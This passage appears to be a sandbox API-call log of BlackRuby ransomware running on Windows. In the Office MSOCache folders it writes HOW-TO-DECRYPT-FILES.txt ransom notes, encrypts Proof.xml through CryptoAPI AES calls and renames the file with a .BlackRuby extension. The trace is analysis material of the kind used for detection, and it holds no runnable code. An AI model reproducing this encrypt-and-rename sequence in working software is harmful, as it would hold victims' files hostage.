ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x17dd0b00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x37a36b60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xc92e04)) returned 1 [0045.957] GetLastError () returned 0x12 [0045.957] SetErrorMode (uMode=0x0) returned 0x1 [0045.957] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0045.957] GetLastError () returned 0x12 [0045.957] SetErrorMode (uMode=0x1) returned 0x0 [0045.957] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.958] GetLastError () returned 0x0 [0045.958] GetFileType (hFile=0x184) returned 0x1 [0045.958] SetErrorMode (uMode=0x0) returned 0x1 [0045.958] GetFileType (hFile=0x184) returned 0x1 [0045.958] WriteFile (in: hFile=0x184, lpBuffer=0x1ca3b1c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1ca3b1c*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0045.959] GetLastError () returned 0x0 [0045.959] CloseHandle (hObject=0x184) returned 1 [0045.959] GetLastError () returned 0x0 [0045.959] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0045.959] GetLastError () returned 0x0 [0045.959] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.959] GetLastError () returned 0x0 [0045.959] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpFilePart=0x0) returned 0x51 [0045.959] GetLastError () returned 0x0 [0045.959] SetErrorMode (uMode=0x1) returned 0x0 [0045.959] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.msi"), fInfoLevelId=0x0, lpFileInformation=0x1ca5850 | out: lpFileInformation=0x1ca5850*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21667300, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x21667300, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x37a0fa60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xa1e00)) returned 1 [0045.959] GetLastError () returned 0x0 [0045.959] SetErrorMode (uMode=0x0) returned 0x1 [0045.960] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0045.960] GetLastError () returned 0x0 [0045.960] SetErrorMode (uMode=0x1) returned 0x0 [0045.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.960] GetLastError () returned 0x5 [0045.962] SetErrorMode (uMode=0x0) returned 0x1 [0045.962] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.962] GetLastError () returned 0x5 [0045.962] SetErrorMode (uMode=0x1) returned 0x0 [0045.962] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x1cc3890 | out: lpFileInformation=0x1cc3890*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x37a0fa60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5b1)) returned 1 [0045.962] GetLastError () returned 0x5 [0045.962] SetErrorMode (uMode=0x0) returned 0x1 [0045.962] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.962] GetLastError () returned 0x5 [0045.962] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.962] GetLastError () returned 0x5 [0045.962] SetErrorMode (uMode=0x1) returned 0x0 [0045.962] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.963] GetLastError () returned 0x0 [0045.963] GetFileType (hFile=0x184) returned 0x1 [0045.963] SetErrorMode (uMode=0x0) returned 0x1 [0045.963] GetFileType (hFile=0x184) returned 0x1 [0045.963] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x5b1 [0045.963] GetLastError () returned 0x0 [0045.963] ReadFile (in: hFile=0x184, lpBuffer=0x1cc5c5c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1cc5c5c*, lpNumberOfBytesRead=0x18ed18*=0x5b1, lpOverlapped=0x0) returned 1 [0045.964] GetLastError () returned 0x0 [0045.964] CloseHandle (hObject=0x184) returned 1 [0045.964] GetLastError () returned 0x0 [0045.964] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.964] GetLastError () returned 0x0 [0045.964] SetErrorMode (uMode=0x1) returned 0x0 [0045.964] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x37a0fa60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5b1)) returned 1 [0045.964] GetLastError () returned 0x0 [0045.964] SetErrorMode (uMode=0x0) returned 0x1 [0045.964] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0045.965] GetLastError () returned 0x0 [0045.998] CryptImportKey (in: hProv=0x37c708, pbData=0x1d215f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ba0) returned 1 [0045.998] GetLastError () returned 0x0 [0045.998] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.998] GetLastError () returned 0x0 [0046.006] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.006] GetLastError () returned 0x0 [0046.006] CryptDuplicateKey (in: hKey=0x360ba0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360d20) returned 1 [0046.006] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.006] GetLastError () returned 0x0 [0046.006] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1b52bcc*=0x1, dwFlags=0x0) returned 1 [0046.006] GetLastError () returned 0x0 [0046.006] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1b52b98, dwFlags=0x0) returned 1 [0046.006] GetLastError () returned 0x0 [0046.006] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b52c14*, pdwDataLen=0x18ed08*=0x6b0, dwBufLen=0x6b0 | out: pbData=0x1b52c14*, pdwDataLen=0x18ed08*=0x6b0) returned 1 [0046.006] GetLastError () returned 0x0 [0046.006] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b539a0*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b539a0*, pdwDataLen=0x18ed20*=0x10) returned 1 [0046.006] GetLastError () returned 0x0 [0046.006] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b539d0*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b539d0*, pdwDataLen=0x18ed28*=0x10) returned 1 [0046.006] GetLastError () returned 0x0 [0046.006] CryptDestroyKey (hKey=0x360ba0) returned 1 [0046.006] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.006] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.006] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.006] GetLastError () returned 0x0 [0046.006] SetErrorMode (uMode=0x1) returned 0x0 [0046.006] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.007] GetLastError () returned 0xb7 [0046.007] GetFileType (hFile=0x184) returned 0x1 [0046.007] SetErrorMode (uMode=0x0) returned 0x1 [0046.007] GetFileType (hFile=0x184) returned 0x1 [0046.009] CloseHandle (hObject=0x184) returned 1 [0046.009] GetLastError () returned 0xb7 [0046.009] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.009] GetLastError () returned 0xb7 [0046.009] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Encrypted_eAu2OTxCuqtzXtJmlap59JmLFg6dg161OHsbKvkVCA.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Encrypted_eAu2OTxCuqtzXtJmlap59JmLFg6dg161OHsbKvkVCA.BlackRuby", lpFilePart=0x0) returned 0x86 [0046.009] GetLastError () returned 0xb7 [0046.009] SetErrorMode (uMode=0x1) returned 0x0 [0046.009] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23a149a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6c0)) returned 1 [0046.009] GetLastError () returned 0xb7 [0046.009] SetErrorMode (uMode=0x0) returned 0x1 [0046.009] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Encrypted_eAu2OTxCuqtzXtJmlap59JmLFg6dg161OHsbKvkVCA.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\encrypted_eau2otxcuqtzxtjmlap59jmlfg6dg161ohsbkvkvca.blackruby")) returned 1 [0046.010] GetLastError () returned 0xb7 [0046.011] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0046.011] GetLastError () returned 0xb7 [0046.011] SetErrorMode (uMode=0x1) returned 0x0 [0046.011] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.011] GetLastError () returned 0x5 [0046.012] SetErrorMode (uMode=0x0) returned 0x1 [0046.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0046.012] GetLastError () returned 0x5 [0046.012] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.012] GetLastError () returned 0x5 [0046.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.012] GetLastError () returned 0x5 [0046.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0046.012] GetLastError () returned 0x5 [0046.012] SetErrorMode (uMode=0x1) returned 0x0 [0046.012] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ba0 [0046.012] GetLastError () returned 0x5 [0046.013] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.013] GetLastError () returned 0x5 [0046.013] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.013] GetLastError () returned 0x5 [0046.013] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.013] GetLastError () returned 0x5 [0046.013] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.013] GetLastError () returned 0x5 [0046.013] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.013] GetLastError () returned 0x12 [0046.013] FindClose (in: hFindFile=0x360ba0 | out: hFindFile=0x360ba0) returned 1 [0046.013] SetErrorMode (uMode=0x0) returned 0x1 [0046.013] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr", lpFilePart=0x0) returned 0x47 [0046.013] GetLastError () returned 0x12 [0046.013] SetErrorMode (uMode=0x1) returned 0x0 [0046.013] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ba0 [0046.013] GetLastError () returned 0x12 [0046.014] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.014] GetLastError () returned 0x12 [0046.014] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.014] GetLastError () returned 0x12 [0046.014] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.014] GetLastError () returned 0x12 [0046.014] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.014] GetLastError () returned 0x12 [0046.014] FindNextFileW (in: hFindFile=0x360ba0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.014] GetLastError () returned 0x12 [0046.014] FindClose (in: hFindFile=0x360ba0 | out: hFindFile=0x360ba0) returned 1 [0046.014] SetErrorMode (uMode=0x0) returned 0x1 [0046.014] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpFilePart=0x0) returned 0x51 [0046.014] GetLastError () returned 0x12 [0046.014] SetErrorMode (uMode=0x1) returned 0x0 [0046.014] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b74d34 | out: lpFileInformation=0x1b74d34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe53a300, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xe53a300, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36f59f30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x13810ea)) returned 1 [0046.015] GetLastError () returned 0x12 [0046.015] SetErrorMode (uMode=0x0) returned 0x1 [0046.015] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0046.015] GetLastError () returned 0x12 [0046.015] SetErrorMode (uMode=0x1) returned 0x0 [0046.015] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.015] GetLastError () returned 0x0 [0046.015] GetFileType (hFile=0x184) returned 0x1 [0046.016] SetErrorMode (uMode=0x0) returned 0x1 [0046.016] GetFileType (hFile=0x184) returned 0x1 [0046.016] WriteFile (in: hFile=0x184, lpBuffer=0x1b907a4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1b907a4*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0046.017] GetLastError () returned 0x0 [0046.017] CloseHandle (hObject=0x184) returned 1 [0046.017] GetLastError () returned 0x0 [0046.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0046.017] GetLastError () returned 0x0 [0046.017] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.017] GetLastError () returned 0x0 [0046.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpFilePart=0x0) returned 0x51 [0046.017] GetLastError () returned 0x0 [0046.017] SetErrorMode (uMode=0x1) returned 0x0 [0046.017] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.msi"), fInfoLevelId=0x0, lpFileInformation=0x1b924d8 | out: lpFileInformation=0x1b924d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21667300, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x21667300, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36f32e30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xa3000)) returned 1 [0046.017] GetLastError () returned 0x0 [0046.017] SetErrorMode (uMode=0x0) returned 0x1 [0046.018] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0046.018] GetLastError () returned 0x0 [0046.018] SetErrorMode (uMode=0x1) returned 0x0 [0046.018] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.018] GetLastError () returned 0x5 [0046.019] SetErrorMode (uMode=0x0) returned 0x1 [0046.019] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpFilePart=0x0) returned 0x51 [0046.019] GetLastError () returned 0x5 [0046.019] SetErrorMode (uMode=0x1) returned 0x0 [0046.019] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.fr\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x1bb01b8 | out: lpFileInformation=0x1bb01b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, 